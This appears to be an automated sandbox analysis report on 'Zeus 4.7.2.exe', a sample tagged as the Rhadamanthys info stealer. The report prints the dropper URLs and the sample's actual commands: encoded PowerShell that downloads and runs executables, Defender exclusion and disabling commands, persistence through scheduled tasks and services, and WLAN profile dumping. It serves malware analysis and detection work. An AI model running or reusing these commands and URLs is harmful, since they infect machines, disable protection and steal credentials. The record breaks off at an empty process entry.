Resubmissions

07-06-2024 15:13

240607-slps8aac5v 10

07-06-2024 15:11

240607-sk3zfsbb99 10

07-06-2024 15:08

240607-sh7vmaac2s 10

07-06-2024 15:05

240607-sgnqcsbb65 10

Analysis

  • max time kernel
    570s
  • max time network
    458s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-06-2024 15:08

General

  • Target

    Zeus 4.7.2.exe

  • Size

    173KB

  • MD5

    28e0ba051ad84949cfedd2a58b1636cb

  • SHA1

    6ff46613adb7594c6abbe0ee9c64a68129501fb8

  • SHA256

    265013eb61e407130b8fe723809549000ffe4ad96ef6c5ad1945e2727cee5aa0

  • SHA512

    a14ea1a7e8756e15aee996c848006a1f2212acd753ca1629224b362fe8ef24331c49617f59bd84846b95a2143744418bbd78a4d0088efab76228344662ae67a4

  • SSDEEP

    3072:NPBBih6XScZZmmiyQrcR6qx6LAIxkN3wlCxvxrtJRscwX7zhhxXNrykAOkvpObQ:Nyh6XffliyQrC6LAIxkpwlOJrtJRscwi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Blocklisted process makes network request 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 18 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 41 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies data under HKEY_USERS 59 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:664
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:524
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:896
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1060
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1072
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1168
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1176
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2796
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1264
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1308
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1432
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1448
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1480
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2560
                                      • C:\Windows\SysWOW64\dialer.exe
                                        "C:\Windows\system32\dialer.exe"
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1972
                                      • C:\Windows\SysWOW64\dialer.exe
                                        "C:\Windows\system32\dialer.exe"
                                        3⤵
                                          PID:1808
                                        • C:\Windows\SysWOW64\dialer.exe
                                          "C:\Windows\system32\dialer.exe"
                                          3⤵
                                            PID:2124
                                          • C:\Windows\SysWOW64\dialer.exe
                                            "C:\Windows\system32\dialer.exe"
                                            3⤵
                                              PID:2876
                                            • C:\Windows\SysWOW64\dialer.exe
                                              "C:\Windows\system32\dialer.exe"
                                              3⤵
                                                PID:5636
                                              • C:\Windows\SysWOW64\dialer.exe
                                                "C:\Windows\system32\dialer.exe"
                                                3⤵
                                                  PID:4460
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              1⤵
                                                PID:1504
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                1⤵
                                                  PID:1516
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                  1⤵
                                                    PID:1656
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                    1⤵
                                                      PID:1732
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                      1⤵
                                                        PID:1748
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1824
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                          1⤵
                                                            PID:1852
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                            1⤵
                                                              PID:1924
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                                PID:1936
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:1992
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                  1⤵
                                                                    PID:2004
                                                                  • C:\Windows\System32\spoolsv.exe
                                                                    C:\Windows\System32\spoolsv.exe
                                                                    1⤵
                                                                      PID:1744
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2176
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                        1⤵
                                                                          PID:2264
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2376
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                            1⤵
                                                                              PID:2504
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                              1⤵
                                                                                PID:2512
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2568
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                  1⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:2760
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2816
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                    1⤵
                                                                                      PID:2836
                                                                                    • C:\Windows\sysmon.exe
                                                                                      C:\Windows\sysmon.exe
                                                                                      1⤵
                                                                                        PID:2856
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                        1⤵
                                                                                          PID:2892
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                          1⤵
                                                                                            PID:2912
                                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3228
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                              1⤵
                                                                                                PID:3432
                                                                                              • C:\Windows\Explorer.EXE
                                                                                                C:\Windows\Explorer.EXE
                                                                                                1⤵
                                                                                                • Modifies Internet Explorer settings
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                • Suspicious use of UnmapMainImage
                                                                                                PID:3532
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Zeus 4.7.2.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Zeus 4.7.2.exe"
                                                                                                  2⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4704
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZgBoACMAPgA="
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1560
                                                                                                  • C:\Users\Admin\HadesHex-GUI.exe
                                                                                                    "C:\Users\Admin\HadesHex-GUI.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1676
                                                                                                  • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                                    3⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1204
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                                                                                                      4⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1512
                                                                                                      • C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg0.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg0.exe"
                                                                                                        5⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2456
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49EA.tmp\49EB.tmp\49EC.bat C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg0.exe"
                                                                                                          6⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:1096
                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                            chcp 1251
                                                                                                            7⤵
                                                                                                              PID:2632
                                                                                                            • C:\Windows\system32\findstr.exe
                                                                                                              findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                                                                                                              7⤵
                                                                                                                PID:4368
                                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                                findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                                                                                                                7⤵
                                                                                                                  PID:2956
                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                  findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                                                                                                                  7⤵
                                                                                                                    PID:4896
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /query /tn "MyBatchScript"
                                                                                                                    7⤵
                                                                                                                      PID:4868
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                                                                                                                      7⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:1800
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                                                                                                                      7⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4564
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                                                                                                                        8⤵
                                                                                                                          PID:4000
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                                                                                                                        7⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:2596
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                                                                                                                          8⤵
                                                                                                                            PID:4176
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
                                                                                                                          7⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2348
                                                                                                                    • C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg1.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg1.exe"
                                                                                                                      5⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:2104
                                                                                                                    • C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg2.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg2.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:2320
                                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                        6⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:1612
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                        6⤵
                                                                                                                          PID:1684
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                          6⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:4912
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                          6⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:3640
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                          6⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:3312
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                          6⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:5096
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                          6⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:3036
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                          6⤵
                                                                                                                            PID:2040
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                            6⤵
                                                                                                                              PID:436
                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                              6⤵
                                                                                                                                PID:3112
                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                6⤵
                                                                                                                                  PID:3752
                                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                                  C:\Windows\system32\dialer.exe
                                                                                                                                  6⤵
                                                                                                                                    PID:368
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    C:\Windows\system32\sc.exe delete "AAWUFTXN"
                                                                                                                                    6⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:2744
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
                                                                                                                                    6⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:2676
                                                                                                                                • C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg3.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg3.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Maps connected drives based on registry
                                                                                                                                  • Modifies system certificate store
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:1696
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    6⤵
                                                                                                                                      PID:3584
                                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                                      attrib +h +s C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg3.exe
                                                                                                                                      6⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:4108
                                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                                      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                      6⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:2488
                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                      wmic csproduct get UUID
                                                                                                                                      6⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1228
                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                      6⤵
                                                                                                                                      • Detects videocard installed
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4988
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\iwaa0hra.pcg3.exe
                                                                                                                                      6⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:1548
                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                      wmic os get Caption
                                                                                                                                      6⤵
                                                                                                                                        PID:2712
                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                        wmic cpu get Name
                                                                                                                                        6⤵
                                                                                                                                          PID:2524
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                          6⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:4828
                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                          wmic path win32_VideoController get name
                                                                                                                                          6⤵
                                                                                                                                          • Detects videocard installed
                                                                                                                                          PID:4364
                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                          wmic csproduct get UUID
                                                                                                                                          6⤵
                                                                                                                                            PID:3624
                                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                            6⤵
                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                            • Views/modifies file attributes
                                                                                                                                            PID:2476
                                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                            6⤵
                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                            • Views/modifies file attributes
                                                                                                                                            PID:1512
                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                            netsh wlan show profiles
                                                                                                                                            6⤵
                                                                                                                                              PID:1392
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
